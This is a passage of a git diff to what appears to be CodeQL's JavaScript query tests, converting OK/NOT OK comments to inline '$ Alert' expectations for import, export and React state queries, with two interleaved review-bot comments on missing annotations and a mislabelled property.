while `this` is, in both cases, guarded by a `super` call, the call does not complete @@ -23,7 +23,7 @@ class A42 extends B2 { constructor() { try { super(); } finally { this.a; } } } class A43 extends B2 { constructor() { try { super(); } catch (err) { } this.a; } } class A44 extends B1 { - constructor() { + constructor() { // $ Alert this.p1 = 0; this.p2 = 0; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js index 7f6071b86963..7d139a4d582c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs) { var res = 0; - for(var i=0; i | | +| selfimport.js:1:1:1:23 | require ... mport') | Module selfimport directly imports itself. | selfimport.js:1:1:1:35 | | | | test1/a.js:1:1:1:27 | require ... ner/a') | Module /test1/a.js imports module .../inner/a.js, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | imports | | test1/a.js:2:1:2:14 | require('./b') | Module a imports module b, which in turn $@ it. | test1/b.js:1:1:1:27 | require ... ner/a') | indirectly imports | | test1/b.js:1:1:1:27 | require ... ner/a') | Module b imports module a, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | indirectly imports | diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref index 944a1f16d023..2f1ba00da9b5 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref @@ -1 +1,2 @@ -NodeJS/CyclicImport.ql \ No newline at end of file +query: NodeJS/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
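Review bot: The known false negatives in ThisBeforeSuper/invalid.js are left unmarked. The first hunk keeps the comment that two cases are "not currently detected (even though they should be)", yet `A43` (a context line of the second hunk) and `A42` (visible only in that hunk's header, so just above it) carry no annotation while every class around them gains `// $ Alert`. I would record them inline with `// $ MISSING: Alert` on both class lines, the same way `// $ SPURIOUS: Alert` is used for `throwerIndirect(42)` in SpuriousArguments/tst.js. That keeps the gap visible in the new format and makes the test flag the annotation once the query starts detecting these cases.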
diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js index 6e20c34bb2ae..e435ffdd6e61 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('a starting'); exports.done = false; -var b = require('./b.js'); +var b = require('./b.js'); // $ Alert console.log('in a, b.done = %j', b.done); exports.done = true; console.log('a done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js index 48d00da05eec..b8b1b26c76a8 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('b starting'); exports.done = false; -var a = require('./a.js'); +var a = require('./a.js'); // $ Alert console.log('in b, a.done = %j', a.done); exports.done = true; console.log('b done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js index 524cd7785c61..015dd055baa7 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js @@ -1 +1 @@ -require('./selfimport'); \ No newline at end of file +require('./selfimport'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js index c50b18df78a5..19e985960836 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js 
@@ -1,2 +1,2 @@
-require('../test2/inner/a');
-require('./b');
\ No newline at end of file
+require('../test2/inner/a'); // $ Alert
+require('./b'); // $ Alert
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js
index 4dad3ca3b97f..c1527dc042ca 100644
--- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js
+++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js
@@ -1 +1 @@
-require('../test2/inner/a');
\ No newline at end of file
+require('../test2/inner/a'); // $ Alert
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js
index c96937e40a33..cc49a519bc0d 100644
--- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js
+++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js
@@ -1 +1 @@
-require('../../test1/a');
\ No newline at end of file
+require('../../test1/a'); // $ Alert
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref
index 6b556de9f00b..c6005b442606 100644
--- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref
+++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref
@@ -1 +1,2 @@
-NodeJS/DubiousImport.ql
\ No newline at end of file
+query: NodeJS/DubiousImport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js
index 2c75ba0124ff..c0c95c0d5f67 100644
--- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js
+++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js
@@ -1,4 +1,4 @@ -var foo = require('./b').foo, +var foo = require('./b').foo, // $ Alert bar = require('./c').bar, sneaky = require('./d').sneaky; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..6f2bd18a9127 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -2,7 +2,7 @@ var b = require('./b'), c = require('./c'), d = require('./d'); -b.foo; +b.foo; // $ Alert c.bar; d.sneaky; b.prototype; @@ -12,7 +12,7 @@ require('./f').tricky; var fs = require('fs'); fs.rename('foo', 'bar', function() {}); -fs.renmae('foo', 'bar', function() {}); +fs.renmae('foo', 'bar', function() {}); // $ Alert fs.move('foo', 'bar', function() {}); var k = require('./k'); @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref index 6864d74ec268..5225f0d052a9 100644 
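Review bot: In the multi_import.js hunk, the trailing comment on the newly annotated `mod2.bar;` line still says that `./b` "does not export `call`", while the property being read is `bar` and the comment two lines above states that `./b` does export `call`. The comment is being rewritten in this change anyway, so its last word should name the property that is actually missing: "`mod2` is `./b`, which does not export `bar`". The `./b` module itself is not visible here, so this is inferred from the neighbouring comments only.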
--- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref @@ -1 +1,2 @@ -NodeJS/InvalidExport.ql \ No newline at end of file +query: NodeJS/InvalidExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js 
+++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js 
@@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js index 091cf6fef202..bd8d05fcd03a 100644 --- a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js @@ -4,5 +4,5 @@ exports.checkOne = function(x) { var checkList = exports.checkList = function(xs) { for (var i=0; iHello {this.props.name}
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js index c790106ba3e1..4c87a1f8b0db 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name= "bar" + this.state.person.name= "bar" // $ Alert return
    Hello {this.props.name}
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js index 291e0044bb3c..e542b14ce357 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" + this.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js index 1b9da154358a..6297f138f002 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js @@ -1,7 +1,7 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" - this.state.person.name.last = "baz" + this.state.person.name.first = "bar" // $ Alert + this.state.person.name.last = "baz" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js index fafcb3600a52..0e112ccd74a7 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js @@ -3,7 +3,7 @@ var Hello = React.createClass({ render: function() { var that = this; - that.state.person.name.first = "bar" + that.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js index 9b88b1786b88..fc4e02c5368a 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = () => this.state.title = 'new title'; + this.updater = () => this.state.title = 'new title'; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js index 6393da58469f..23ce21fbca64 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = function(){this.state.title = 'new title';}; + this.updater = function(){this.state.title = 'new title';}; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref index bab216c48331..eed73b7bfa4c 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref @@ -1 +1,2 @@ -React/InconsistentStateUpdate.ql \ No newline at end of file +query: React/InconsistentStateUpdate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..0c73d7ef0772 100644 
--- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } 
@@ -26,73 +26,73 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK - }); + counter: this.state.foo + }); // $ Alert } } class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } } class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice - }); + foo: this.state.foo, + bar: this.state.bar // OK - ignored because it is safe in practice + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK - }); + foo: self.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } 
diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref index dfa6c80426f6..9d1de0e203a6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref @@ -1 +1,2 @@ -React/UnsupportedStateUpdateInLifecycleMethod.ql \ No newline at end of file +query: React/UnsupportedStateUpdateInLifecycleMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..41dcc713ceb1 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
    } }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
    } @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
    } @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
    } }); @@ -97,7 +97,7 @@ React.createClass({ this.setState({}) }, render: function() { - this.indirectUpdate(); + this.indirectUpdate(); // $ Alert return
    } }); @@ -105,9 +105,9 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -115,9 +115,9 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected index fd0b9853a6ac..74825d5a26d8 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected 
@@ -1,7 +1,7 @@ -| issue7506.js:12:1:12:34 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | -| undefined.js:32:1:32:34 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. | undefined.js:35:9:35:57 | this.st ... yAccess | read | -| undefined.js:61:19:61:19 | {\\n r ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | -| unused.js:1:1:1:34 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | -| unused.js:27:1:27:34 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | +| issue7506.js:12:1:12:45 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | +| undefined.js:32:1:32:45 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. 
| undefined.js:35:9:35:57 | this.st ... yAccess | read | +| undefined.js:61:19:61:30 | { // $ ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | +| unused.js:1:1:1:45 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | +| unused.js:27:1:27:45 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref index 2b285a04cd8f..a767c2444b8d 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref @@ -1 +1,2 @@ -React/UnusedOrUndefinedStateProperty.ql \ No newline at end of file +query: React/UnusedOrUndefinedStateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { 
diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,14 +1,14 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } -class C3 extends React.Component { +class C3 